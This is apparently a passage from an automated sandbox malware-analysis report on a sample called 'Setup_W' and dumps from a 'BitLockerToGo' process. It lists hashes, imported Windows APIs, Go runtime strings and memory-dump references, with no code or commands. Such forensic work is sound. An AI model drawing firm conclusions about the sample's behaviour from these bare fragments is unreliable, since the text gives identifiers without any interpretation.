                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoMonitorwcscmp
                                                                                                • String ID: h
                                                                                                • API String ID: 2112724651-2439710439
                                                                                                • Opcode ID: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
                                                                                                • Instruction ID: f03be016e800082238e742283fde96a3313a8a764e9bcebccff95e88b6ecb0fc
                                                                                                • Opcode Fuzzy Hash: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
                                                                                                • Instruction Fuzzy Hash: E4F044719042099BDB10DF99DD80ADEBBF8FF88754F00842AE994D7341D735D9149BA1
                                                                                                Strings
                                                                                                • m->p= max= min= next= p->m= prev= span=% util%s[%d]%w: GT%w: IN%w: LT(...), i = , not , val .local.onion.reloc390625<-chanAnswerArabicAugustBrahmiCANCELCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOAWAYGetACPGothicHangulHatranHebrewHy, xrefs: 009D36CB
                                                                                                • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 009D3761
                                                                                                • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLa, xrefs: 009D3717
                                                                                                • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB), xrefs: 009D36A9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2012483524.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2012469084.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012633658.0000000000BE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012633658.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012788116.0000000000E57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012802441.0000000000E60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012844036.0000000000F03000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012855315.0000000000F05000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012866010.0000000000F06000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012876851.0000000000F07000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012888016.0000000000F08000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012899101.0000000000F37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012957027.0000000000F3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012968805.0000000000F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2012968805.0000000000F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_990000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: m->p= max= min= next= p->m= prev= span=% util%s[%d]%w: GT%w: IN%w: LT(...), i = , not , val .local.onion.reloc390625<-chanAnswerArabicAugustBrahmiCANCELCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOAWAYGetACPGothicHangulHatranHebrewHy$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLa$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB)
                                                                                                • API String ID: 0-4218688440
                                                                                                • Opcode ID: fc84a1cf3818abafaec5a6adaadcb2ea32a635d51a3e00401860b47c05b78050
                                                                                                • Instruction ID: cb7f48da65ee66720a741def776cf85c9036763e43d74cdaa3ef9bca6936aa30
                                                                                                • Opcode Fuzzy Hash: fc84a1cf3818abafaec5a6adaadcb2ea32a635d51a3e00401860b47c05b78050
                                                                                                • Instruction Fuzzy Hash: CD31F3B89087459FC304EF24C195B1EBBE4BF88705F41892DE8888B352DB35D988DB63
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,6460C5CF), ref: 646083C2
                                                                                                • calloc.MSVCRT ref: 646083EE
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6460841B
                                                                                                • free.MSVCRT ref: 6460843B
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
                                                                                                • String ID:
                                                                                                • API String ID: 1537213191-0
                                                                                                • Opcode ID: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
                                                                                                • Instruction ID: 3fad4399fbb3fd9b921955e3d7d79b08c776be0bad752d566589edefa5aa6e19
                                                                                                • Opcode Fuzzy Hash: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
                                                                                                • Instruction Fuzzy Hash: 7B11DAB05093019FD750EF69C68534EBFF4EF85768F009A2EE8D88B290D3B499448B93
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                • String ID:
                                                                                                • API String ID: 682475483-0
                                                                                                • Opcode ID: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
                                                                                                • Instruction ID: ee5cbb80369ca3e531f180af7fda5c4d324b963a5661de7ff54391a54ec4a6e4
                                                                                                • Opcode Fuzzy Hash: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
                                                                                                • Instruction Fuzzy Hash: B9F0FFB2908290CBDF11BFBEC88490A7BB4EA62348F015078DD4887204E630E918CBA3
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
                                                                                                • Instruction ID: b6f1c58577b93784980e3ecbb57c81fa0641531103505bd7ed912e0c9460b5dc
                                                                                                • Opcode Fuzzy Hash: 8d5a8716e24c012280490af13f37645d92314cb5b32e981a8aeed7d70d494b59
                                                                                                • Instruction Fuzzy Hash: 21E01274A096049BEB00BF7DD4C485BBFE4EF58254F01486AED848F305DB35D8519BE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.2145432878.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 032E1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_32e1000_BitLockerToGo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e2dac68c586158efe3c9f0e657d95d1566c4212d24e3eba8b7a692698d4b049b
                                                                                                • Instruction ID: b1bf7a3c097c86cfcce7816a8bc55a2979cc9ac659d0146dd54ef36882d63be2
                                                                                                • Opcode Fuzzy Hash: e2dac68c586158efe3c9f0e657d95d1566c4212d24e3eba8b7a692698d4b049b
                                                                                                • Instruction Fuzzy Hash: 03622AA240E3C18FD313CB748CA66917FB1AF27204B5E09DBC4C4CF2A3E2696569D756
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2d4b533407f74c5d214f1334b191176c6a3663c1e33650d6675be27f8b12c6ed
                                                                                                • Instruction ID: c7b872dd0feaf9d0c8ff0ff8965226549de8d4e8229277a1ec3e956b4c88e299
                                                                                                • Opcode Fuzzy Hash: 2d4b533407f74c5d214f1334b191176c6a3663c1e33650d6675be27f8b12c6ed
                                                                                                • Instruction Fuzzy Hash: 82523335009BA5AFDF23DB32C89C7503BE1EF1725430D46EAD4888F4AAE66495C6CB47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.2145432878.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, Offset: 032E1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_32e1000_BitLockerToGo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 32362e948257e3c6d22cac1a2fee27b50ff79fd5e4600345c4ceb6a3e1260879
                                                                                                • Instruction ID: 077ac683a119e458dd864a6a74f5fcd9c95de62292461e2cf6e8b0dc537ba789
                                                                                                • Opcode Fuzzy Hash: 32362e948257e3c6d22cac1a2fee27b50ff79fd5e4600345c4ceb6a3e1260879
                                                                                                • Instruction Fuzzy Hash: DC81066240E7C19FD3138B748CA66917FB1AF13200B1E49DBC4C4CF2A3E26C6669DB56
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 13a583d80d2522399f431ca6c863b5649c27c56793678206392903918c906bb9
                                                                                                • Instruction ID: 2d25b6446a9c354cfbdb6d64472fee5d4110dc6596ecac84cb2202b3de912885
                                                                                                • Opcode Fuzzy Hash: 13a583d80d2522399f431ca6c863b5649c27c56793678206392903918c906bb9
                                                                                                • Instruction Fuzzy Hash: 2C61121545E7C24FEB178B7449A9492FFA4BD5312431EC7DFC8D98E8A3C30A918AD362
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000003.2145451743.0000000003286000.00000004.00000020.00020000.00000000.sdmp, Offset: 03286000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_3_3286000_BitLockerToGo.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                • Instruction ID: f7ce1a626ddd8b876ff0a4c6d7d88c6e5d179238e4cd02217f61bd67420e369c
                                                                                                • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                • Instruction Fuzzy Hash: A62134611092D18FD703CF34D4A4A82BFA2FF8B32639E80DDC8C18F427C2A66542CB42